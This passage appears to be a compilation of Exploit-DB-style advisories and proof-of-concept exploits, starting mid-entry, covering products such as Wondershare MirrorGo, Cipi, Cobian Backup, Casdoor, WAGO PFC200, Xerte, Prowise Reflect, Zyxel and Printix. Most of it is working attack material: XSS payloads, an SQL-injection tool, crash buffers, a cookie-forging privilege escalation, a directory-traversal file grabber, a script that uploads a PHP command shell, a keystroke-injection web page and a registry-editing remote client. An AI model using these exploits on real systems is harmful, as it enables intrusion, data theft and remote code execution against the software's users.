SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable "ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it with a malicious file that will be executed with "LocalSystem" privileges.

# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 24.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/> # Software Link: https://cipi.sh/ <https://www.aapanel.com/> # Version: 3.1.15 # Tested on: Ubuntu When the user wants to add a new server on the "Server" panel, in "name" parameter has not had any filtration. POST /api/servers HTTP/1.1 Host: IP Content-Length: 102 Accept: application/json X-Requested-With: XMLHttpRequest Authorization: Bearer User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Content-Type: application/json Origin: http://IP Referer: http://IP/servers Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close { "name":"\"><script>alert(1337)</script>", "ip":"10.10.10.10", "provider":"local", "location":"xss test" }

# Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2022-02-16 # Vendor Homepage: https://www.cobiansoft.com/ # Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe # Tested Version: 0.9.93 RC1 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py # 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard # 3.- Open "Cobian Reflector User Interface" # 4.- Task -> "New task" # 5.- Files -> Source "Add" -> SFTP # 6.- Host -> 10.10.10.10 # 7.- Port-> 22 # 8.- User name -> admin # 9.- Paste ClipBoard on "Password" # 10.- Test settings # 11.- Yes # 12.- Crashed #!/usr/bin/env python buffer = "\x41" * 8000 f = open ("Cobian_Reflector_0.9.93_RC1.txt", "w") f.write(buffer) f.close()

# Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2022-02-16 # Vendor Homepage: https://www.cobiansoft.com/ # Software Link: https://files.cobiansoft.com/programs/cbSetup.exe # Tested Version: 11.2.0.582 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: Cobian_Backup_11.2.0.582.py # 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard # 3.- Open "Cobian Backup 11 Gravity User Interface" # 4.- Task -> "New task" # 5.- File -> Source "Add" -> FTP # 6.- Host -> 10.10.10.10 # 7.- Port-> 21 # 8.- User name -> admin # 9.- Paste ClipBoard on "Password" # 10.- Ok # 11.- Crashed #!/usr/bin/env python buffer = "\x41" * 800 f = open ("Cobian_Backup_11.2.0.582.txt", "w") f.write(buffer) f.close()

# Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-24 # Vendor Homepage: https://www.cobiansoft.com/ # Software Link : https://files.cobiansoft.com/programs/cbSetup.exe # Tested Version: 11.2.0.582 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """ Cobian Backup 11 Gravity CobianBackup11 C:\Program Files (x86)\Cobian Backup 11\cbService.exe Auto # Service info: C:\>sc qc CobianBackup11 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CobianBackup11 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Cobian Backup 11\cbService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cobian Backup 11 Gravity DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) // Date: 2022-02-25 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://casdoor.org/ // Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0 // Version: version < 1.13.1 // Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r // Tested on: Kali Linux // CVE : CVE-2022-24124 // Github POC: https://github.com/ColdFusionX/CVE-2022-24124 // Exploit Usage : go run exploit.go -u http://127.0.0.1:8080 package main import ( "flag" "fmt" "html" "io/ioutil" "net/http" "os" "regexp" "strings" ) func main() { var url string flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)") flag.Parse() banner := ` -=Casdoor SQL Injection (CVE-2022-24124)=- - by Mayank Deshmukh (ColdFusionX) ` fmt.Printf(banner) fmt.Println("[*] Dumping Database Version") response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)") if err != nil { panic(err) } defer response.Body.Close() databytes, err := ioutil.ReadAll(response.Body) if err != nil { panic(err) } content := string(databytes) re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)") result := re.FindAllString(content, -1) sqliop := fmt.Sprint(result) replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "") finalop := replacer.Replace(sqliop) fmt.Println(html.UnescapeString(finalop)) if result == nil { fmt.Printf("Application not vulnerable\n") os.Exit(1) } }

# Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation # Date: 02/16/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB # Vendor Homepage: https://www.wago.com # Version: Firmware version 03.05.10(17) # Tested on: PopOS! [Linux](Firefox) ======================================== = The ordinary user privilege request: ======================================== GET /wbm/ HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.1/wbm/ Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true} ========================================== = Manipulated Cookie to Admin Privilege: ========================================== GET /wbm/ HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.1/wbm/ Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}

# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip # Version: up until 3.10.3 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44665 # This PoC assumes guest login is enabled. Vulnerable url: # https://<host>/getfile.php?file=<user-direcotry>/../../database.php # You can find a userfiles-directory by creating a project and browsing the media menu. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download # The userfiles-direcotry will be noted in the URL and/or when you download a file. # They look like: <numbers>-<username>-<templatename> import requests import re xerte_base_url = "http://127.0.0.1" file_to_grab = "/../../database.php" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id) # Use a default template data = { 'tutorialid': 'Nottingham', 'templatename': 'Nottingham', 'tutorialname': 'exploit', 'folder_id': '' } # Create a new project in order to create a user-folder template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) # Find template ID data = { 'template_id': re.findall('(\d+)', template_id.text)[0] } # Find the created user-direcotry: user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0] # Grab file result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) print(result.text) print("|-- Used Variables: --|") print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID']) print("user direcotry: " + user_direcotry) print("Curl example:") print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)

# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip # Version: up until version 3.9 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44664 # This PoC assumes guest login is enabled and the en-GB langues files are used. # This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell. # Vulnerable url: https://<host>/website_code/php/import/fileupload.php # The mediapath variable can be used to set the destination of the uploaded. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota import requests import re xerte_base_url = "http://127.0.0.1" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id) # Use a default template data = { 'tutorialid': 'Nottingham', 'templatename': 'Nottingham', 'tutorialname': 'exploit', 'folder_id': '' } # Create a new project in order to find the install path template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) # Find template ID data = { 'template_id': re.findall('(\d+)', template_id.text)[0] } # Find the install path: install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3', 'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978', } # index.inc file data = \ '''-----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc" Content-Type: application/octet-stream <?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; } /** * * index.php english language file * * @author Patrick Lockley * @version 1.0 * @copyright Pat Lockley * @package */ define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password"); define("INDEX_USERNAME_EMPTY", "Please enter your username"); define("INDEX_PASSWORD_EMPTY", "Please enter your password"); define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page"); define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct"); define("INDEX_LOGIN", "login area"); define("INDEX_USERNAME", "Username"); define("INDEX_PASSWORD", "Password"); define("INDEX_HELP_TITLE", "Getting Started"); define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website."); define("INDEX_HELP_INTRO_LINK_TEXT","Show me!"); define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_FOLDER_PROMPT","What would you like to call your folder?"); define("INDEX_WORKSPACE_TITLE","My Projects"); define("INDEX_CREATE","Project Templates"); define("INDEX_DETAILS","Project Details"); define("INDEX_SORT","Sort"); define("INDEX_SEARCH","Search"); define("INDEX_SORT_A","Alphabetical A-Z"); define("INDEX_SORT_Z","Alphabetical Z-A"); define("INDEX_SORT_NEW","Age (New to Old)"); define("INDEX_SORT_OLD","Age (Old to New)"); define("INDEX_LOG_OUT","Log out"); define("INDEX_LOGGED_IN_AS","Logged in as"); define("INDEX_BUTTON_LOGIN","Login"); define("INDEX_BUTTON_LOGOUT","Logout"); define("INDEX_BUTTON_PROPERTIES","Properties"); define("INDEX_BUTTON_EDIT","Edit"); define("INDEX_BUTTON_PREVIEW", "Preview"); define("INDEX_BUTTON_SORT", "Sort"); define("INDEX_BUTTON_NEWFOLDER", "New Folder"); define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create"); define("INDEX_BUTTON_DELETE", "Delete"); define("INDEX_BUTTON_DUPLICATE", "Duplicate"); define("INDEX_BUTTON_PUBLISH", "Publish"); define("INDEX_BUTTON_CANCEL", "Cancel"); define("INDEX_BUTTON_SAVE", "Save"); define("INDEX_XAPI_DASHBOARD_FROM", "From:"); define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:"); define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:"); define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups"); define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses"); define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard"); define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options"); define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns"); define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview"); define("INDEX_XAPI_DASHBOARD_PRINT", "Print"); \r \r -----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="mediapath" ''' \ + install_path \ + '''../../../languages/en-GB/ -----------------------------170331411929658976061651588978--\r ''' # Overwrite index.inc file response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data) print('Installation path: ' + install_path) print(response.text) if "success" in response.text: print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')

# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection # Date: 30/10/2022 # Exploit Author: Rik Lutz # Vendor Homepage: https://www.prowise.com/ # Version: V1.0.9 # Tested on: Windows 10 # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. # Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed), # or by visiting a malicious website. This POC contains the malicious webpage. # Steps: # 1. Start Prowise reflect # 2. Try to connect to a reflect server e.q. ygm7u6od # 3. When it is connecting click exploit # - Start menu will open, types notepad.exe and types hello world. <!DOCTYPE HTML> <html> <head> <script type = "text/javascript"> function wait(ms){ var start = new Date().getTime(); var end = start; while(end < start + ms) { end = new Date().getTime(); } } function WebSocketTest() { var StateConnecting = new Boolean(false); if ("WebSocket" in window) { // Let us open a web socket var ws = new WebSocket("ws://localhost:8082"); ws.onopen = function() { ws.send('{"event":"keyboard", "key":"super"}'); wait(400); //character is slower // ws.send('{"event":"keyboard", "character":"notepad.exe"}'}; // You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true var exploitcode = "notepad.exe" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(300); ws.send('{"event":"keyboard", "key":"enter"}'); wait(2000); exploitcode = "Hello world!" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(200); }; ws.onmessage = function (evt) { var received_msg = evt.data; }; ws.onclose = function() { // websocket is closed. alert("Connection is closed..."); }; } else { // The browser doesn't support WebSocket alert("WebSocket NOT supported by your Browser!"); } } </script> </head> <body> <div id = "sse"> <a href = "javascript:WebSocketTest()">Exploit!</a> </div> </body> </html>

# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS) # Date: 1/3/2022 # Exploit Author: Momen Eldawakhly (CyberGuy) # Vendor Homepage: https://www.zyxel.com # Version: ZyWALL 2 Plus # Tested on: Ubuntu Linux [Firefox] # CVE : CVE-2021-46387 GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1 Host: vuln.ip:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE) # Date: 3/1/2022 # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25089 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089 using Microsoft.Win32; using Newtonsoft.Json; using Newtonsoft.Json.Converters; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; /** * ________________________________________ * * Printix Vulnerability, CVE-2022-25089 * Part of a Printix Vulnerability series * Author: Logan Latvala * Github: https://github.com/ComparedArray/printix-CVE-2022-25089 * ________________________________________ * */ namespace ConsoleApp1a { public class PersistentRegistryData { public PersistentRegistryCmds cmd; public string path; public int VDIType; public byte[] registryData; } [JsonConverter(typeof(StringEnumConverter))] public enum PersistentRegistryCmds { StoreData = 1, DeleteSubTree, RestoreData } public class Session { public int commandNumber { get; set; } public string host { get; set; } public string data { get; set; } public string sessionName { get; set; } public Session(int commandSessionNumber = 0) { commandNumber = commandSessionNumber; switch (commandSessionNumber) { //Incase it's initiated, kill it immediately. case (0): Environment.Exit(0x001); break; //Incase the Ping request is sent though, get its needed data. case (2): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); data = "pingData"; sessionName = "PingerRinger"; break; //Incase the RegEdit request is sent though, get its needed data. case (49): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); PersistentRegistryData persistentRegistryData = new PersistentRegistryData(); persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData; persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType; //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName"; Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n"); Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n"); Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE"); Console.Write("Registry Node: "); persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix"); Console.WriteLine("Full Address Set To: " + persistentRegistryData.path); //persistentRegistryData.registryData = new byte[2]; //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String); Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n"); Console.Write("Type: "); int dataF = int.Parse(Console.ReadLine()); Console.WriteLine("Set Data to: " + dataF); Console.WriteLine("\n What value is your type? \n"); Console.Write("Value: "); string dataB = Console.ReadLine(); Console.WriteLine("Set Data to: " + dataF); byte[] loader = null; List<byte> byteContainer = new List<byte>(); //Dword = 4 //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!) switch (dataF) { case (1): loader = selectDataType(dataB, RegistryValueKind.String); byteContainer.Add(1); break; case (2): loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord); byteContainer.Add(4); break; case (3): loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord); byteContainer.Add(11); break; case (4): loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString); byteContainer.Add(7); break; } int pathHolder = 0; foreach (byte bit in loader) { pathHolder++; byteContainer.Add(bit); } persistentRegistryData.registryData = byteContainer.ToArray(); //added stuff: //PersistentRegistryData data = new PersistentRegistryData(); //data.cmd = PersistentRegistryCmds.RestoreData; //data.path = ""; //data.cmd Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData)); data = JsonConvert.SerializeObject(persistentRegistryData); break; //Custom cases, such as custom JSON Inputs and more. case (100): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); Console.WriteLine("\n What Data Should Be Sent?\n"); Console.Write("Data: "); data = Console.ReadLine(); Console.WriteLine("Data set to: " + data); Console.WriteLine("\n What Session Name Should Be Used? \n"); Console.Write("Session Name: "); sessionName = Console.ReadLine(); Console.WriteLine("Session name set to: " + sessionName); break; } } public static byte[] selectDataType(object value, RegistryValueKind format) { byte[] array = new byte[50]; switch (format) { case RegistryValueKind.String: //1 array = Encoding.UTF8.GetBytes((string)value); break; case RegistryValueKind.DWord://4 array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value)); break; case RegistryValueKind.QWord://11 if (value == null) { value = 0L; } array = BitConverter.GetBytes((long)value); break; case RegistryValueKind.MultiString://7 { if (value == null) { value = new string[1] { string.Empty }; } string[] array2 = (string[])value; foreach (string s in array2) { byte[] bytes = Encoding.UTF8.GetBytes(s); byte[] second = new byte[1] { (byte)bytes.Length }; array = array.Concat(second).Concat(bytes).ToArray(); } break; } } return array; } } class CVESUBMISSION { static void Main(string[] args) { FORCERESTART: try { //Edit any registry without auth: //Use command 49, use the code provided on the desktop... //This modifies it directly, so no specific username is needed. :D //The command parameter, a list of commands is below. int command = 43; //To force the user to input variables or not. bool forceCustomInput = false; //The data to send, this isn't flexible and should be used only for specific examples. //Try to keep above 4 characters if you're just shoving things into the command. string data = "{\"profileID\":1,\"result\":true}"; //The username to use. //This is to fulfill the requriements whilst in development mode. DefaultValues.CurrentSessName = "printixMDNs7914"; //The host to connect to. DEFAULT= "localhost" string host = "192.168.1.29"; // Configuration Above InvalidInputLabel: Console.Clear(); Console.WriteLine("Please select the certificate you want to use with port 21338."); //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now. Console.WriteLine("Already selected, client authentication isn't needed."); Console.WriteLine(" /───────────────────────────\\ "); Console.WriteLine("\nWhat would you like to do?"); Console.WriteLine("\n 1. Send Ping Request"); Console.WriteLine(" 2. Send Registry Edit Request"); Console.WriteLine(" 3. Send Custom Request"); Console.WriteLine(" 4. Experimental Mode (Beta)\n"); Console.Write("I choose option # "); try { switch (int.Parse(Console.ReadLine().ToLower())) { case (1): Session session = new Session(2); command = session.commandNumber; host = session.host; data = session.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (2): Session sessionTwo = new Session(49); command = sessionTwo.commandNumber; host = sessionTwo.host; data = sessionTwo.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (3): Console.WriteLine("What command number do you want to input?"); command = int.Parse(Console.ReadLine().ToString()); Console.WriteLine("What IP would you like to use? (Default = localhost)"); host = Console.ReadLine(); Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)"); data = Console.ReadLine(); Console.WriteLine("What session name do you want to use? "); DefaultValues.CurrentSessName = Console.ReadLine(); break; case (4): Console.WriteLine("Not yet implemented."); break; } } catch (Exception e) { Console.WriteLine("Invalid Input!"); goto InvalidInputLabel; } Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala"); Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n"); CompCommClient client = new CompCommClient(); byte[] responseStorage = new byte[25555]; int responseCMD = 0; client.Connect(host, 21338, 3, 10000); client.SendMessage(command, Encoding.UTF8.GetBytes(data)); // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it. // Check for output multiple times, and see if this is conclusive. //client.SendMessage(51, Encoding.ASCII.GetBytes(data)); new Thread(() => { //Thread.Sleep(4000); if (client.Connected()) { int cam = 0; // 4 itterations of loops, may be lifted in the future. while (cam < 5) { //Reads the datastream and keeps returning results. //Thread.Sleep(100); try { try { if (responseStorage?.Any() == true) { //List<byte> byo1 = responseStorage.ToList(); if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption")) { foreach (char cam2 in Encoding.UTF8.GetString(responseStorage)) { if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2)) { Console.Write(cam2); } } }else { } } } catch (Exception e) { Debug.WriteLine(e); } client.Read(out responseCMD, out responseStorage); } catch (Exception e) { goto ReadException; } Thread.Sleep(100); cam++; //Console.WriteLine(cam); } } else { Console.WriteLine("[WARNING]: Client is Disconnected!"); } ReadException: try { Console.WriteLine("Command Variable Response: " + responseCMD); Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD); client.disConnect(); } catch (Exception e) { Console.WriteLine("After 4.2 Seconds, there has been no response!"); client.disConnect(); } }).Start(); Console.WriteLine(responseCMD); Console.ReadLine(); } catch (Exception e) { Console.WriteLine(e); Console.ReadLine(); //Environment.Exit(e.HResult); } goto FORCERESTART; } } }